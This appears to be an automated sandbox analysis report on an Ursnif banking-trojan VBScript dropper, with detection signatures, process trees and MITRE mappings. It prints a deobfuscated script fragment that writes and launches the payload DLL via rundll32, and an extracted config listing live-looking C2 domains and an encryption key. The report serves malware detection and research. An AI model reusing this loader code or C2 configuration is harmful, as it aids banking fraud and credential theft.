Play interactive tour

Edit tour

Analysis Report Attachment_32954.vbs

Overview

General Information

Sample Name:	Attachment_32954.vbs
Analysis ID:	384531
MD5:	39eb3427fd329de93a19190d84273710
SHA1:	5d9009503b3500c0b6d35e272dd9160e9d873e46
SHA256:	adf9ca509037dc8ae4090fa9fa92c8eee621a9860a00da566b25643aa8689799
Tags:	vbs
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Benign windows process drops PE files

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

VBScript performs obfuscated calls to suspicious functions

Yara detected Ursnif

Deletes itself after installation

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found potential string decryption / allocating functions

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

wscript.exe (PID: 5540 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Attachment_32954.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

rundll32.exe (PID: 6488 cmdline: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 4072 cmdline: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

Threatname: Ursnif

[{"RSA Public Key": "Xbs4Yk4n2aUcz4nAfmYBHRwWIvRHnuvNCkzGzFhWDffWAD6kAaz2nCrF+u1fBJy8EZGc5Sx4iFpGkK2Uml3/gsvcGmjbZA/KVSRirY7ISIz8qSDXCl7R7DH3QGwTH7G685n2r1rm1yDtD6HT1if24i3j6DsMpQyEccHcvxhbfoMgObXp5CGN5OHsQ+ytis2D"}, {"c2_domain": ["api10.laptok.at/api1", "golang.feel500.at/api1", "go.in100k.at/api1"], "botnet": "2200", "server": "730", "serpent_key": "hPdaZZCB2qcI31br", "sleep_time": "10", "SetWaitableTimer_value": "1"}]

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
20.2.rundll32.exe.70250000.4.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
20.3.rundll32.exe.bca25e.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 20.2.rundll32.exe.48f94a0.3.raw.unpack

Malware Configuration Extractor: Ursnif [{"RSA Public Key": "Xbs4Yk4n2aUcz4nAfmYBHRwWIvRHnuvNCkzGzFhWDffWAD6kAaz2nCrF+u1fBJy8EZGc5Sx4iFpGkK2Uml3/gsvcGmjbZA/KVSRirY7ISIz8qSDXCl7R7DH3QGwTH7G685n2r1rm1yDtD6HT1if24i3j6DsMpQyEccHcvxhbfoMgObXp5CGN5OHsQ+ytis2D"}, {"c2_domain": ["api10.laptok.at/api1", "golang.feel500.at/api1", "go.in100k.at/api1"], "botnet": "2200", "server": "730", "serpent_key": "hPdaZZCB2qcI31br", "sleep_time": "10", "SetWaitableTimer_value": "1"}]

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\Rabin.dmg	Virustotal: Detection: 50%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Rabin.dmg	Metadefender: Detection: 25%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Rabin.dmg	ReversingLabs: Detection: 72%

Multi AV Scanner detection for submitted file

Show sources

Source: Attachment_32954.vbs	Virustotal: Detection: 36%	Perma Link
Source: Attachment_32954.vbs	Metadefender: Detection: 16%	Perma Link
Source: Attachment_32954.vbs	ReversingLabs: Detection: 31%

Source:

Binary string: c:\Poorplay\halfUs\BoardFamous\outexperience\us.pdb source: wscript.exe, 00000001.00000003.339767368.000001DAF14EF000.00000004.00000001.sdmp, rundll32.exe, 00000014.00000002.473616478.00000000702AD000.00000002.00020000.sdmp, Rabin.dmg.1.dr

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_00DC3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		20_2_00DC3512
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702A088D FindFirstFileExW,		20_2_702A088D

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_7025161B GetProcAddress,NtCreateSection,memset,	20_2_7025161B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702515D9 NtMapViewOfSection,	20_2_702515D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702523C5 NtQueryVirtualMemory,	20_2_702523C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_00DC11A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	20_2_00DC11A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_00DCB159 NtQueryVirtualMemory,	20_2_00DCB159

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702521A4	20_2_702521A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_00DC28E9	20_2_00DC28E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_00DCAF34	20_2_00DCAF34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702A466E	20_2_702A466E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_70290FE0	20_2_70290FE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702A7120	20_2_702A7120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_7029BA3F	20_2_7029BA3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702AA29E	20_2_702AA29E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702AA3BE	20_2_702AA3BE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702A75B8	20_2_702A75B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_7029B7DA	20_2_7029B7DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702AB7DF	20_2_702AB7DF

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\Rabin.dmg 94EB81BC58ADB976F21344D3EB273C9EB833AFBCADD121EB2AD38F1EF07A1F85

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: String function: 70294250 appears 39 times

Source: Attachment_32954.vbs

Initial sample: Strings found which are bigger than 50

Source: Rabin.dmg.1.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal92.troj.evad.winVBS@5/8@0/0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_00DC31DD CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

20_2_00DC31DD

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\adobe.url

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Attachment_32954.vbs'

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer

Source: Attachment_32954.vbs	Virustotal: Detection: 36%
Source: Attachment_32954.vbs	Metadefender: Detection: 16%
Source: Attachment_32954.vbs	ReversingLabs: Detection: 31%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Attachment_32954.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Attachment_32954.vbs

Static file information: File size 1444626 > 1048576

Source:

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions

Show sources

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Sleep 7000End With' pervasive glasswort corrector dinghy gander Oedipus mattress morrow Francis vibrato lawman Omaha pledge madstone grub ampersand heredity = 0REM age vex robe, maidservant midge presentation helm Klux racy Brahms judiciary, 1016749 barbarous recalcitrant grove = 1000Do While heredity < 100000000REM impetus Roth fudge souffle decorous Pravda inglorious calculate Paraguayan magnum repairmen Nassau If (heredity = 100000000) ThenWScript.Quit' KS decolletage Moiseyev nameable. Madeline Ellen script catastrophic hardwood Hankel tempest scriptural prime blab Hodges End IfIf (heredity = 5000000) Thengrove = grove + ((800 - 101.0) - ((66 + 3188.0) - 2655.0))End IfIf (heredity = 200) ThenExit DoEnd ifREM room Bohr. shard Germany nightmare standoff. 3540175 tetrahedron, 3863241 holler ailanthus spillover marriage stimulant lacrosse handicraftsman heredity = heredity + 1LoopREM shad eventide hour800 vicissitude Aeneas fledge reflectance bicep optimism enfant swirl, messieurs floorboard, Middletown Mira Ankara With WScript.Sleep 5000End WithEnd FunctionFunction hideout655()REM eyeball knack isomer chromatin Nassau692 Pangaea astonish. caliph, critic oedipal bravo If (InStr(WScript.ScriptName, "TESTING") > 0) ThenREM Iliad rennet manioc. visitor bootleg hart slaughterhouse, insurrect, 5691938 jejune clam exterior Rabin176 painstaking MsgBOX("RUN")Exit FunctionEnd Ifmoan("1")Set restaurant = CreateObject("WScript.Shell")restaurant.Run "rundll32" + " " + nepotism + "Rabin.dmg" + ",DllRegisterServer"prime623End FunctionFunction artful(dermatology, stagnant)Dim Byronic, deviateSet Byronic = CreateObject("Scripting.FileSystemObject")Set deviate = Byronic.CreateTextFile(dermatology, True)Dim pawpaw: pawpaw = (16 + (((78 + (-10.0)) - 36.0) + 252.0))Dim felsite506: felsite506 = (((54 + 4882.0) - (6837 - 1931.0)) + (-30.0))For Each soulful In stagnantREM Barr meteorite resonate cabdriver Lysenko sycophantic, 7200240 busywork tremendous facade xylophone locksmith inch RandomizeREM boggy255 tomography pander notebook. 7111724 contour strum period Reese Ouagadougou onrushing pathogenic fractionate = Int((pawpaw-felsite506+1)*Rnd+felsite506)If fractionate < (((90 + 1660.0) - (306 - 101.0)) - 1445.0) Thendeviate.WriteLine(soulful)ElseIf fractionate > (((73 - 20.0) + (31 + 3924.0)) - 3908.0) And fractionate < (((73 - 20.0) + (31 + 3924.0)) - 3908.0) Thendeviate.Write soulful + ":"Elsedeviate.Write soulfuldeviate.WriteBlankLines((((1304 - 545.0) - (27 + 8.0)) - 723.0))End IfNextdeviate.Close' baptism postdoctoral catalogue exclamatory layoff screenplay finny contact. linoleum Sagittarius downhill End FunctionFunction Gerhard()on error resume next' extensible Gibson spiderwort Datsun Barbara telemeter Costello Enoch. plume tribesmen jot sergeant mack Kirkland marriage649 Dim Aides: Set Aides = CreateObject("Scripting.FileSystemObject")' granular perspicacious Zanzibar indisposition oviform riverbank hasten. petunia kittenish tire gemsbok, 98142

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_70252193 push ecx; ret	20_2_702521A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_70252140 push ecx; ret	20_2_70252149
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_00DCABF0 push ecx; ret	20_2_00DCABF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_00DCAF23 push ecx; ret	20_2_00DCAF33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_70264AB7 push ebx; ret	20_2_70264AB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_70265B21 push edi; ret	20_2_70265B3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_70266BBB push ebx; retf	20_2_70266BBD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702ABF08 push ecx; ret	20_2_702ABF06

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\Rabin.dmg

Jump to dropped file

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\Rabin.dmg

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE

Deletes itself after installation

Show sources

Source: C:\Windows\System32\wscript.exe

File deleted: c:\users\user\desktop\attachment_32954.vbs

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\wscript.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\wscript.exe TID: 4120

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local FullSizeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_00DC3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		20_2_00DC3512
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702A088D FindFirstFileExW,		20_2_702A088D

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_7029FAB7 IsDebuggerPresent,OutputDebugStringW,

20_2_7029FAB7

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702A0417 mov eax, dword ptr fs:[00000030h]	20_2_702A0417
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702A045B mov eax, dword ptr fs:[00000030h]	20_2_702A045B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702A048C mov eax, dword ptr fs:[00000030h]	20_2_702A048C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_70299DD7 mov eax, dword ptr fs:[00000030h]	20_2_70299DD7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702C204F mov eax, dword ptr fs:[00000030h]	20_2_702C204F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702C1C56 push dword ptr fs:[00000030h]	20_2_702C1C56
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_702C2390 mov eax, dword ptr fs:[00000030h]	20_2_702C2390

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_7029400F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_7029400F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_70294667 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_70294667
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_70299747 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_70299747

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\System32\wscript.exe

File created: Rabin.dmg.1.dr

Jump to dropped file

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer

Jump to behavior

Source: rundll32.exe, 00000014.00000002.470567376.0000000002FE0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: rundll32.exe, 00000014.00000002.470567376.0000000002FE0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000014.00000002.470567376.0000000002FE0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000014.00000002.470567376.0000000002FE0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_00DCA12A cpuid

20_2_00DCA12A

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,	20_2_7025111B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoEx,GetLocaleInfoW,	20_2_7029D950
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	20_2_702A4BBD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesEx,	20_2_7029D7FD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	20_2_702A5223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	20_2_702A5349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	20_2_7029D3D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	20_2_702A544F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	20_2_702A551E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	20_2_702A4E5F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	20_2_702A4EAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	20_2_702A4F45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	20_2_702A4FD0

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_7025116D GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

20_2_7025116D

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_00DCA12A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

20_2_00DCA12A

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_70251756 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

20_2_70251756

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting121	Path Interception	Process Injection12	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion2	LSASS Memory	Query Registry1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Security Software Discovery12	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Virtualization/Sandbox Evasion2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Scripting121	LSA Secrets	Process Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information3	Cached Domain Credentials	Account Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Rundll321	DCSync	System Owner/User Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing1	Proc Filesystem	File and Directory Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	File Deletion1	/etc/passwd and /etc/shadow	System Information Discovery45	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

